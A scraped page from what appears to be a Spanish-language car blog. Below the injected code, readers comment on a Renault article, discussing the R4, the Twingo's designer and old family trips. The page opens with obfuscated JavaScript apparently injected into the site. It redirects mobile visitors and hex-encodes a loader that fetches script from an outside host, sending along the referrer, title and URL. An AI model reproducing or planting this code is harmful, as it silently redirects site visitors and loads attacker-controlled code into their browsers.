)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

8 Comentarios, RSS

  1. alejandro marino 06/02/2018 @ 8:15 pm

    Como es posible que la oficina de prensa de Renault ilustre el parrafo dedicado al R4 con un insulso ejemplar color gris…en vez de una imagen del multicolor cuyo dominio colocado termina en 375…( igual que mi pesadilla sueco-yanqui, nada es casual!! ).
    Inadmisible !!!

  2. Ettore 07/02/2018 @ 10:26 am

    Twingo, 25 años adelantado. Saben quien lo diseñó?

    • Beppe Viola 07/02/2018 @ 2:06 pm

      Disenado por Jean-Pierre Ploué bajo la direccion del genial Patrick Le Quément

  3. Güilbeis 07/02/2018 @ 12:06 pm

    El que lo diseñó parece que no podía sacar de su mente al Baskid diseñado 10 años antes por un estudio polaco para FMS como posible reemplazo del 126.
    Se copió, eh!

    https://es.wikipedia.org/wiki/FSM_(autom%C3%B3viles)#/media/File:Beskid.JPG

    • Beppe Viola 07/02/2018 @ 2:13 pm

      y si…. se inspiraron bastante (al menos en el design esterno), casi casi al limite del plagio…. tambien FIAT en la definiciòn de la parte trasera del “cinquecento seconda serie”… pobres polacos.. nunca vieron un mango por ello

  4. sovrasterzo 07/02/2018 @ 12:32 pm

    Si uno ve hoy que ofrece Renault (Dacia, quise decir) en Argentina, es para pegarse un corchaso en los 00…

  5. Güilbeis 07/02/2018 @ 6:37 pm

    4/4 – El tipo que está sentado atrás mira a la morocha pensando: estás tan buena que te voy a partir en cuatro. En cambio ella espera que terminen rápido con la foto para bajarse porque no aguanta al viejo. Al de adelante le afanaron el cucurucho de la mano izquierda. La de blanco piensa que parecen cuatro imbéciles jugando al auto de papá y ya empezó a bajarse.

    Colorale – Si eso es un SUV, yo soy George Clooney.

  6. MARIO 08/02/2018 @ 11:57 am

    Todavía tengo mi fiel Senic 2002 1,6 generalmente la uso cuando voy a las carreras zonales…., si no hay donde dormir es un dormitorio basde doble esplendido. Ni que decir cuando mis hijos eran chicos los viajes que le metimos siempre fiel, Tilcara, humauca.. altas cumbres, Cachi…etc. no creo que lo que ofrezca Renault sea para pegarse un corhazo no estoy de acuerdo.

Tu email no será publicado. Required fields are marked *

*


*

21

Fotos enviadas por un amigo desde un desarmadero de Inglaterra. Datsun 240 Z, gloria... Seguir Leyendo >>

10